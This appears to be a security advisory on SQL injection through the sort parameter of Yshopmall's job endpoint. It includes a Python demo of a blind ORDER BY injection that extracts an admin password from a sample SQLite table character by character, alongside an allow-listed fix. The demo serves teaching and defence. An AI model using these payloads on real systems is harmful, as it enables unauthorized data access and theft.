Guchengwuyue Yshopmall SQL Injection Vulnerability in Job Controller
Vulnerability
A SQL injection vulnerability has been identified in Guchengwuyue Yshopmall in versions through 1.9.1. The flaw is in the getJobs function of JobController, which passes the user-controlled sort parameter into the database query without validation, so an attacker who controls that parameter can execute SQL of their choosing. The vulnerability can be exploited remotely, and a public exploit is available.
Impact
Exploitation of this vulnerability allows SQL injection: an attacker can interfere with the queries the application sends to its database. Depending on the database account's privileges, this can lead to unauthorized reading of data, modification or deletion of records, or administrative operations on the database. A sort value is normally spliced into an ORDER BY clause, which cannot be bound as a prepared-statement parameter, so the correct fix is to validate the parameter against an allow-list of permitted column names and directions rather than to rely on parameterization alone.
Reproduction
To reproduce this vulnerability, send a GET request to the /api/jobs endpoint with a crafted sort parameter. The request must include a valid Authorization header with a Bearer token, so an account (or a captured token) for the target instance is required. The request can be sent with Postman, curl, or a short script that automates it; a practical check is to send two sort values that differ only in an injected conditional expression and confirm that the order of the returned jobs changes, which shows the expression is being evaluated by the database.
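The following example, added here to illustrate the mechanism described above and the blind-probe style of check suggested for reproduction, is not Yshopmall's own code. It simulates an endpoint that splices a sort parameter into ORDER BY, shows how an attacker uses that to extract data from an unrelated table one character at a time, and contrasts it with an allow-listed version. The table names, column names, the "column,direction" sort format and the sample data are assumptions made for the demonstration; the database is an in-memory SQLite instance rather than the application's real backend.

```python
import sqlite3
from urllib.parse import urlencode

# Constructed sample data (assumption, not Yshopmall's schema): a jobs table
# that the endpoint legitimately reads, plus a users table it should never expose.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE jobs (id INTEGER, name TEXT, cron TEXT);
        INSERT INTO jobs VALUES (1, 'cleanup', '0 0 * * *'),
                                (2, 'report',  '0 6 * * *'),
                                (3, 'backup',  '0 2 * * *');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cr3t');
    """)
    return conn


def get_jobs_vulnerable(conn, sort):
    """Mirrors the flaw described in the advisory: sort is concatenated into ORDER BY."""
    sql = "SELECT id, name FROM jobs ORDER BY " + sort
    return [row[0] for row in conn.execute(sql)]


ALLOWED_COLUMNS = {"id", "name", "cron"}
ALLOWED_DIRECTIONS = {"asc", "desc"}


def get_jobs_hardened(conn, sort):
    """Allow-list column and direction; ORDER BY cannot be a bound parameter."""
    column, _, direction = sort.partition(",")
    column = column.strip()
    direction = (direction.strip() or "asc").lower()
    if column not in ALLOWED_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"rejected sort parameter: {sort!r}")
    # Only values from the fixed sets above can reach the query string.
    sql = f"SELECT id, name FROM jobs ORDER BY {column} {direction}"
    return [row[0] for row in conn.execute(sql)]


def request_url(sort):
    """The crafted query string an attacker would send (page/size names assumed)."""
    return "/api/jobs?" + urlencode({"page": 0, "size": 10, "sort": sort})


def blind_probe(conn, condition):
    """Boolean oracle: result order flips depending on whether condition is true."""
    payload = f"(CASE WHEN ({condition}) THEN id ELSE -id END)"
    return get_jobs_vulnerable(conn, payload)


def extract_admin_password(conn, max_len=8):
    """Character-by-character extraction via the ordering oracle."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    ascending = [1, 2, 3]  # order observed when the injected condition is true
    out = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = (f"(SELECT substr(password,{pos},1) FROM users "
                    f"WHERE username='admin')='{ch}'")
            if blind_probe(conn, cond) == ascending:
                out += ch
                break
        else:
            break  # no character matched: end of string
    return out


if __name__ == "__main__":
    db = make_db()
    print("request:", request_url("(CASE WHEN (1=1) THEN id ELSE -id END)"))
    print("vulnerable, sort=id:", get_jobs_vulnerable(db, "id"))
    print("extracted via ORDER BY oracle:", extract_admin_password(db))
    try:
        get_jobs_hardened(db, "(CASE WHEN (1=1) THEN id ELSE -id END)")
    except ValueError as exc:
        print("hardened:", exc)
```

The probe relies only on the order of rows in a normal response, which is why an injection confined to a sort clause is still fully exploitable even when the application never shows database errors. The hardened version never lets the raw value reach SQL at all; the same allow-list approach applies to a Spring Pageable sort or any other framework that builds ORDER BY from request input.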
